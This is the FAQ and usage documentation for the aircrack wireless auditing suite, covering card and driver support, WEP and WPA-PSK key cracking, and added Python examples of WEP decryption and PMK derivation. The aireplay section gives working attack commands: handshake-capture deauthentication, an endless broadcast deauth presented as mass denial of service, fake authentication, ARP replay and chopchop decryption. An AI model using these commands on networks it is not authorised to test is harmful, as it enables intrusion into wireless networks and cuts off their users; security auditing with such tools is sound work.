aircrack documentation


What is aircrack ?

aircrack is a set of tools for auditing wireless networks:
  • airodump: 802.11 packet capture program
  • aireplay: 802.11 packet injection program
  • aircrack: static WEP and WPA-PSK key cracker
  • airdecap: decrypts WEP/WPA capture files

Where to download aircrack ?

The official download location is http://www.cr0.net:8040/code/network/. However, if you can't access port 8040 for some reason, you may use this mirror instead: http://linuxfromscratch.org/~devine/network/.

Also check this WEP cracking video, and this other WPA cracking video (flash required).

What is the song in that WEP cracking video ?

The name of the song is Moskau, performed by Dschinghis Khan.

How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developed by a talented hacker named KoreK.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300,000 IVs, and 104-bit WEP can be cracked with 1,000,000 IVs; if you're out of luck you may need two million IVs, or more.

I can't seem to capture any IVs !

Possible reasons:

  • You are standing too far from the access point.
  • There is no traffic on the target wireless network.
  • There is some G traffic but you're capturing in B mode.
  • Something is wrong with your card (firmware problem ?)

By the way, beacons are just unencrypted announcement packets. They're totally useless for WEP cracking.

Why is there no Windows version of aireplay ?

WildPackets' PEEK driver doesn't support 802.11 packet injection, period.

Why is there no Windows version of aircrack ?

I don't have enough time to maintain the win32 port of aircrack. Just install cygwin and compile aircrack with it.

Is my card compatible with airodump / aireplay ?

First of all, search Google to find which chipset your card has. For example, if you have a Linksys WPC54G, search for "wpc54g chipset linux".

I will NOT answer emails asking " I have [wireless card foo], does it work with airodump or aireplay ? "

Chipset support (airodump for Windows / airodump for Linux / aireplay for Linux):

  HermesI
    airodump (Windows): YES (Agere driver)
    airodump (Linux):   YES (patched orinoco driver)
    aireplay (Linux):   NO (firmware corrupts the MAC header)

  Prism2
    airodump (Windows): NO, but see LinkFerret for an alternative
    airodump (Linux):   YES (HostAP driver or wlan-ng driver), STA firmware 1.5.6 or newer required
    aireplay (Linux):   YES (with HostAP or wlan-ng, driver patching required)

  PrismGT
    airodump (Windows): NO, but see LinkFerret for an alternative (FullMAC only)
    airodump (Linux):   YES (prism54 driver, FullMAC cards only!)
    aireplay (Linux):   YES (no patch required)

  Atheros
    airodump (Windows): YES (WildPackets driver)
    airodump (Linux):   YES (madwifi driver)
    aireplay (Linux):   YES (B mode only, driver patching required)

  RTL8180
    airodump (Windows): YES (WildPackets driver)
    airodump (Linux):   YES (rtl8180-sa2400 driver)
    aireplay (Linux):   YES (driver patching required)

  Aironet
    airodump (Windows): YES (WildPackets driver, known firmware issue)
    airodump (Linux):   YES (airo driver, firmware 4.25.30 required)
    aireplay (Linux):   NO

  Ralink b
    airodump (Windows): NO
    airodump (Linux):   UNKNOWN (rt2400 driver)
    aireplay (Linux):   NO

  Ralink b/g
    airodump (Windows): NO
    airodump (Linux):   YES (rt2500 driver)
    aireplay (Linux):   YES (driver patching required)

  Centrino b
    airodump (Windows): NO
    airodump (Linux):   PARTIAL: the ipw2100 driver doesn't discard corrupted packets
    aireplay (Linux):   NO

  Centrino b/g
    airodump (Windows): NO
    airodump (Linux):   YES (ipw2200 driver)
    aireplay (Linux):   NO

  TI (ACX100 / ACX111)
    airodump (Windows): NO
    airodump (Linux):   UNKNOWN (acx100 driver)
    aireplay (Linux):   NO

  Broadcom
    airodump (Windows): NO
    airodump (Linux):   NO (and btw, airodump is NOT compatible with ndiswrapper)
    aireplay (Linux):   NO

Some cards are not recognized by the WildPackets driver, even though they have the correct chipset. In this case, open the hardware manager, select your card, "Update the driver", select "Install from a specific location", select "Don't search, I will choose the driver to install", click "Have disk", set the path to where the WildPackets driver has been unzipped, uncheck "Show compatible hardware", and finally choose the driver.

How do I update my Prism2 firmware ?

Make sure you are using patched HostAP (see below for instructions on how to patch and install HostAP). Alternatively, you may boot the WHAX Live CD (which already has patched HostAP) and run the switch-to-hostap script.

Now that HostAP is loaded, you can check your firmware's primary and station version with this command:

# dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1  (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4  (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2 and MUST use STA firmware version 1.5.6. Otherwise, you should use PRI 1.1.1 / STA 1.7.4, which is the most stable firmware version for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x; people have reported having trouble with them.

To update the firmware, you'll need prism2_srec from the hostap-utils package; if it's not present on your system, download hostap-utils from http://hostap.epitest.fi/, detar it and run make to compile prism2_srec.

Finally, download the firmware and flash your card. If the NIC id is between 0x8002 and 0x8008:

wget http://linux.junsun.net/intersil-prism/firmware/1.5.6/sf010506.hex
prism2_srec -v -f wlan0 sf010506.hex

Otherwise:

wget http://linux.junsun.net/intersil-prism/firmware/1.7.4/pk010101.hex
wget http://linux.junsun.net/intersil-prism/firmware/1.7.4/sf010704.hex
prism2_srec -v -f wlan0 pk010101.hex sf010704.hex

Another alternative is to update the firmware with WinUpdate. See http://www.netgate.com/support/prism_firmware/ (note: the Linksys WPC11 driver v2.5 must be installed, too).

Which is the best card to buy ?

My favourite card is the Netgear WAG511, which is Atheros-based and has excellent sensitivity (no external antenna connector though). Another nice Atheros card is the Proxim 8470-WD, which has an external MC antenna connector. A cheap Atheros card is the DWL-G650 (either rev. B or C; do not buy the DWL-650+, which has a TI chipset); the PCI equivalent is the DWL-G520 (likewise, don't buy the G520+).

How do I use airodump for Windows ?

First of all, make sure that your card is compatible (see table above) and that you have installed the proper driver from WildPackets. Also, you must download Peek.dll and Peek5.sys and put them in the same directory as airodump.exe.

When running airodump, you should specify:

  • The network interface index number, which must be picked in the list displayed by airodump.
  • The network interface type ('o' for HermesI and Realtek, 'a' for Aironet and Atheros).
  • The channel number, between 1 and 14. You can also specify 0 to hop between all channels.
  • The output prefix. For example, if the prefix is "foo", then airodump will create foo.cap (captured packets) and foo.txt (CSV statistics).
  • The "only IVs" flag. Specify 1 if you just want to save the IVs from WEP data packets. This saves space, but the resulting file (foo.ivs) will only be useful for WEP cracking.

To stop capturing packets, simply press Ctrl-C. You may get a blue screen; this is due to a bug in the PEEK driver not properly exiting monitor mode. The capture file may also be empty; the cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X ?

Both airodump and aireplay sources are linux-specific. There are no plans to port them to any other operating system.

How do I use airodump for Linux ?

Before running airodump, you may start the airmon.sh script to list the detected wireless interfaces.

  usage: airodump <interface name or pcap filename>
                  <output prefix> <channel> [IVs flag]

The first argument can be an interface name (such as: eth1, ath0, wlan0, etc.) in which case airodump will capture packets on this interface. You may also specify a pcap filename instead, for example to analyze a previous capture.

You can hop between channels by specifying 0 as the channel number; however, when attacking a WLAN you should rather specify the channel number of the target access point. Also, the channel number will be ignored if the packet source is a capture file.

You may set the optional IVs flag to only write the captured WEP IVs; this will save a lot of space, but the resulting file won't be useful for anything else than WEP cracking. If the flag is not set, the whole packets are saved.

Some examples:

  Channel hopping with HostAP:   airodump wlan0 out 0
  Capture packets on channel 7:  airodump ath0 wlan-dump 7
  Extract IVs from a pcap file:  airodump out.cap small 0 1

What's the meaning of the fields displayed by airodump ?

airodump will display a list of detected access points, and also a list of connected clients ("stations"). Here's an example screenshot using a Prism2 card with HostAP:

 BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID 

 00:13:10:30:24:9C  223     1045              203   6  48  WEP  myap

 BSSID              STATION            PWR   Packets  ESSID

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B  203       154  myap
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190        17  myap

  Field        Description
  BSSID        MAC address of the access point.
  PWR          Signal level reported by the card. Its meaning depends on the driver, but the higher the value, the closer you are to the AP or the station.
  Beacons      Number of announcement packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
  IP / # Data  LAN IP address if unencrypted, otherwise the number of captured WEP or WPA encrypted data packets (including data broadcast packets).
  CH           Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump is not hopping, because of radio interference.
  MB           Maximum speed supported by the AP. If MB = 11, it's 802.11b; if MB = 22, it's 802.11b+; higher rates are 802.11g.
  ENC          Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA), WEP (without the question mark) indicates static or dynamic WEP, and WPA if TKIP or CCMP is present.
  ESSID        The so-called "SSID", which can be empty if SSID cloaking is activated. In this case, airodump will try to recover the SSID from probe responses and association requests.
  STATION      MAC address of each associated station. In the screenshot above, two clients have been detected (00:09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).

How do I merge multiple capture files ?

You may use the mergecap program (part of the ethereal-common package or the win32 distribution):

mergecap -w out.cap test1.cap test2.cap test3.cap

As of now, it's not possible to merge .ivs files.

Can I use Ethereal to capture 802.11 packets ?

Under Linux, simply set up the card in monitor mode with the airmon.sh script. Under Windows, Ethereal can NOT capture 802.11 packets.

How do I use aircrack ?

Usage: aircrack [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodump and aircrack at the same time: aircrack will auto-update when new IVs are available.

Here's a summary of all available options:

  Option  Param.  Description
  -a      amode   Force attack mode (1 = static WEP, 2 = WPA-PSK).
  -e      essid   If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is cloaked (hidden).
  -b      bssid   Select the target network based on the access point's MAC address.
  -p      nbcpu   On SMP systems, set this option to the number of CPUs.
  -q      none    Enable quiet mode (no status output until the key is found, or not).
  -c      none    (WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
  -d      start   (WEP cracking) Set the beginning of the WEP key (in hex), for debugging purposes.
  -m      maddr   (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use every IV, regardless of the network.
  -n      nbits   (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
  -i      index   (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
  -f      fudge   (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
  -k      korek   (WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
  -x      none    (WEP cracking) Do not bruteforce the last two keybytes.
  -y      none    (WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
  -w      words   (WPA cracking) Path to a wordlist.

Could you implement a resume option in aircrack ?

There are no plans to implement this feature.

How can I crack a WPA-PSK network ?

You must wait until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay. Also, a good dictionary is required; see http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.

I have more than one million IVs, but aircrack doesn't find the key !

Possible reasons:

  • Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.
  • If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static.
  • A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental single reverse attack (-y).

I've found the key, how do I decrypt a capture file ?

Simply use the airdecap program:
  usage: airdecap [options] <pcap file>

      -l       : don't remove the 802.11 header
      -b bssid : access point MAC address filter
      -k pmk   : WPA Pairwise Master Key in hex
      -e essid : target network ascii identifier
      -p pass  : target network WPA passphrase
      -w key   : target network WEP key in hex

  examples:

  airdecap -b 00:09:5B:10:BC:5A open-network.cap
  airdecap -w 11A3E229084349BC25D97E2939 wep.cap
  airdecap -e my_essid -p my_passphrase tkip.cap
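What airdecap -w does to each WEP data frame, shown as an added Python example that is not aircrack's code: it uses the 104-bit key from the example above, builds one constructed frame body so there is something to decrypt, and shows the cleartext 3-byte IV, the RC4 seed IV||key and the CRC-32 ICV check that rejects frames encrypted under a different key.

```python
import struct
import zlib

# 104-bit WEP key taken from the airdecap example above (-w 11A3E229084349BC25D97E2939).
WEP_KEY = bytes.fromhex("11A3E229084349BC25D97E2939")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP XORs this keystream over data || ICV."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, key_index: int, payload: bytes) -> bytes:
    """Build a WEP frame body: IV(3) | key-id byte | RC4_{IV||key}(payload || CRC32 ICV).
    Used here only to construct sample input. Note that the per-packet IV is simply
    prepended to the long-term key to form the RC4 seed, and is sent in the clear."""
    if len(key) not in (5, 13):
        raise ValueError("WEP keys are 40-bit (5 bytes) or 104-bit (13 bytes)")
    if len(iv) != 3:
        raise ValueError("WEP IV is 3 bytes")
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    key_id_byte = (key_index & 0x03) << 6  # 2-bit key index in the top bits, rest is padding
    return iv + bytes([key_id_byte]) + rc4(iv + key, payload + icv)


def wep_decrypt(key: bytes, body: bytes):
    """Per data frame: read the cleartext IV and key index, seed RC4 with IV||key,
    strip the trailing ICV and verify it. Returns (iv, key_index, payload, icv_ok);
    a frame whose ICV does not verify was not encrypted under this key."""
    if len(body) < 4 + 4:
        raise ValueError("frame body too short to hold IV, key-id byte and ICV")
    iv, key_index = body[:3], body[3] >> 6
    plain = rc4(iv + key, body[4:])
    payload, icv = plain[:-4], plain[-4:]
    icv_ok = struct.unpack("<I", icv)[0] == (zlib.crc32(payload) & 0xFFFFFFFF)
    return iv, key_index, payload, icv_ok


# Constructed sample frame body: LLC/SNAP header (ethertype 0x0806) plus a dummy payload.
SAMPLE_PAYLOAD = bytes.fromhex("aaaa03000000" "0806") + b"constructed-arp-body"
SAMPLE_IV = bytes.fromhex("a1b2c3")  # constructed IV; this is what a .ivs file records
SAMPLE_BODY = wep_encrypt(WEP_KEY, SAMPLE_IV, 0, SAMPLE_PAYLOAD)


def demo() -> dict:
    """Decrypt the sample with the right key and with a wrong (all-zero) key."""
    iv, idx, payload, ok = wep_decrypt(WEP_KEY, SAMPLE_BODY)
    wrong = wep_decrypt(bytes(13), SAMPLE_BODY)
    return {
        "iv": iv.hex(),
        "key_index": idx,
        "decrypted_ok": ok,
        "payload_matches": payload == SAMPLE_PAYLOAD,
        "wrong_key_icv_ok": wrong[3],
    }


if __name__ == "__main__":
    print(demo())
```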

How do I recover my WEP key in Windows ?

You may use the WZCOOK program which recovers WEP keys from XP's Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your service pack level.

Does WZCOOK also recover WPA keys ?

WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is the result of the passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself can't be recovered -- however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration file should look like:

network={
    ssid="my_essid"
    pmk=b026324c69[...]0510
}
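The PMK derivation described above, and the ESSID-salting remark in the WPA-PSK question, as an added Python example that is not part of aircrack or this FAQ: it derives the PMK with PBKDF2-HMAC-SHA1, checks it against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE"), writes the network={...} stanza in the form shown above, and demonstrates that the same passphrase yields a different PMK under another ESSID (the ESSID "myap" is the one from this page, used as a constructed input).

```python
import hashlib

# Known-answer test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA-PSK PMK = PBKDF2-HMAC-SHA1(passphrase, salt = ESSID, 4096 iterations, 32 bytes).
    The 256-bit output needs two 160-bit SHA1 blocks, each iterated 4096 times, which is
    the "8192 hashes" mentioned above; the ESSID (and so its length) acts as the salt."""
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA-PSK passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), 4096, 32)


def wpa_supplicant_network_block(essid: str, pmk: bytes) -> str:
    """Render the network={...} stanza shown above, carrying the PMK in hex."""
    return 'network={\n    ssid="%s"\n    pmk=%s\n}\n' % (essid, pmk.hex())


def pmk_is_essid_bound(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """Same passphrase, two ESSIDs: the PMKs differ, so a table of PMKs precomputed
    for one network name says nothing about a network with a different name."""
    return derive_pmk(passphrase, essid_a) != derive_pmk(passphrase, essid_b)


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    assert pmk.hex() == IEEE_VECTOR_PMK
    print(wpa_supplicant_network_block("IEEE", pmk))
    print("PMK changes with the ESSID:", pmk_is_essid_bound("password", "IEEE", "myap"))
```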

How do I patch the driver for injection with aireplay ?

As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC), Atheros, RTL8180 and Ralink 2500. Injection on other chipsets (including, but not limited to, HermesI, Aironet and Centrino) is not supported.

Furthermore, all drivers (except prism54) must be patched so as to support injection in Monitor mode. Some drivers require the full kernel source to be compiled. If that's not already the case, you should download the linux source and compile a custom kernel. If you have trouble patching and compiling stuff, you may want to use the WHAX or Auditor LiveCD; both already include patched device drivers.

  • Installing the madwifi driver (Atheros cards)
    ifconfig ath0 down
    rmmod ath_pci 2>/dev/null
    
    cd /usr/src
    wget http://madwifi.otaku42.de/2005/05/\
    madwifi-cvs-snapshot-2005-05-25.tar.bz2
    tar -xvjf madwifi-cvs-snapshot-2005-05-25.tar.bz2
    cd madwifi
    patch -Np1 -i ~/aircrack-2.2/linux/patch/madwifi-20050309.patch
    make && make install
    modprobe ath_pci
    Important note: injection with madwifi only works in B mode, so aireplay will automatically set up the card in this mode by running "iwpriv ath0 mode 2". You can switch back to b/g mode afterwards with "iwpriv ath0 mode 0".

  • Installing the prism54 driver (PrismGT FullMAC cards)
    ifconfig eth1 down
    rmmod prism54 2>/dev/null
    
    cd /usr/src
    wget http://prism54.org/pub/linux/snapshot/tars/\
    prism54-svn-latest.tar.bz2
    tar -xvjf prism54-svn-latest.tar.bz2
    cd prism54-svn-latest
    make modules && make install
    mkdir -p /usr/lib/hotplug/firmware
    mkdir -p /lib/firmware
    wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
    cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
    mv 1.0.4.3.arm /lib/firmware/isl3890
  • Installing the HostAP driver (Prism2 cards)
    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
    /etc/init.d/pcmcia stop
    rmmod prism2_pci 2>/dev/null
    rmmod hostap_pci 2>/dev/null
    
    cd /usr/src
    wget http://hostap.epitest.fi/releases/hostap-driver-0.3.9.tar.gz
    tar -xvzf hostap-driver-0.3.9.tar.gz
    cd hostap-driver-0.3.9
    patch -Np1 -i ~/aircrack-2.2/linux/patch/hostap-driver-0.3.9.patch
    make && make install
    mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
    /etc/init.d/pcmcia start
    modprobe hostap_pci
    Note: injection on Prism2 is still experimental and may sometimes misbehave. If for some reason aireplay seems stuck, you'll have to reset the card with "iwpriv wlan0 reset 1" and restart aireplay.

  • Installing the wlan-ng driver (Prism2 cards)

    Note: if you have trouble with this driver, use HostAP instead.

    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
    /etc/init.d/pcmcia stop
    rmmod prism2_pci 2>/dev/null
    rmmod hostap_pci 2>/dev/null
    
    cd /usr/src
    wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/\
    linux-wlan-ng-0.2.1-pre26.tar.bz2
    tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
    cd linux-wlan-ng-0.2.1-pre26
    patch -Np1 -i ~/aircrack-2.2/linux/patch/wlanng-0.2.1-pre26.patch
    make config && make all
    find /lib/modules \( -name p80211* -o -name prism2* \) \
        -exec rm -v {} \;
    make -C src install
    cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
    mv -f /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
    /etc/init.d/pcmcia start
    modprobe prism2_pci
  • Installing the r8180-sa2400 driver (RTL8180 cards)
    ifconfig wlan0 down
    rmmod r8180 2>/dev/null
    
    cd /usr/src
    wget http://sf.gds.tuwien.ac.at/r/rt/rtl8180-sa2400/\
    rtl8180-0.21.tar.gz
    tar -xvzf rtl8180-0.21.tar.gz
    cd rtl8180-0.21
    patch -Np1 -i ~/aircrack-2.2/linux/patch/rtl8180-0.21.patch
    make && make install
    modprobe r8180
  • Installing the rt2500 driver (Ralink b/g cards)
    ifconfig ra0 down
    rmmod rt2500 2>/dev/null
    
    cd /usr/src
    wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
    tar -xvzf rt2500-cvs-daily.tar.gz
    cd rt2500-cvs-20050721
    patch -Np1 -i ~/aircrack-2.2/linux/patch/rt2500-cvs-20050721.patch
    cd Module
    make && make install
    modprobe rt2500

How do I use aireplay ?

aireplay implements a set of five different attacks. In the following, 00:13:10:30:24:9C is the MAC address of the access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a wireless client.

  • Attack 0: deauthentication

    This attack is mostly useful for capturing WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. Of course, this attack is totally useless if there are no wireless clients.

    Some examples:

    • WPA Handshake capture with an Atheros
      airmon.sh start ath0
      airodump ath0 out 6  (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C ath0; iwpriv ath0 mode 0
      Note that we switch back to b/g mode after injecting, just in case the handshake takes place in G mode.

    • ARP request generation with a Prism2 card
      airmon.sh start wlan0
      airodump wlan0 out 6  (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C wlan0
      aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
      
      After sending the five batches of deauthentication packets, we start listening for ARP requests with attack "3". The -h option is mandatory and has to be the MAC address of an associated client.

    • Mass denial-of-service with a Prism54 card
      airmon.sh start eth1
      aireplay -0 0 -a 00:13:10:30:24:9C eth1
      With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.

  • Attack 1: fake authentication

    This attack is particularly useful when there are no connected clients: we create a fake client MAC address which will be registered in the AP's association table. This address will then be used for attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption). However, if there is already an associated client, it's more reliable to just use its MAC address.

    aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
    12:14:06  Sending Authentication Request
    12:14:06  Authentication successful
    12:14:06  Sending Association Request
    12:14:07  Association successful :-)
    Note: some access points require the client to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, run "aireplay -1 30 -e ...".

    If this attack seems to fail (aireplay keeps sending authentication requests), make sure that:

    • You are close enough to the access point.
    • The driver is properly patched and installed.
    • The card is configured on the same channel as the AP.
    • The BSSID (-a option) is correct.

  • Attack 2: interactive packet replay

    This attack is mostly useless and is present for debugging purposes only.

  • Attack 3: ARP-request reinjection

    The classic ARP-request replay attack is the most effective way to generate new IVs, and works very reliably. You need either the MAC address of an associated client, or a fake MAC from attack 1. This attack will fail if there is no traffic on the wireless LAN.

    aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
    Saving ARP requests in replay_arp-0627-121526.cap
    You must also start airodump to capture replies.
    Read 2493 packets (got 1 ARP requests), sent 1305 packets...

  • Attack 4: KoreK's "chopchop" (WEP decryption)

    This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes.

    1. First, we decrypt one packet :
      aireplay -4 -h 00:09:5B:EB:C5:2B ath0
    2. Let's have a look at the IP address :
      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
    3. Now forge an ARP request :

      The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
      00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
    4. Replay our forged ARP request :
      aireplay -2 -r arp.cap ath0

Finally, I'd like to thank all the many, many people who contributed to aircrack... you know who you are :-)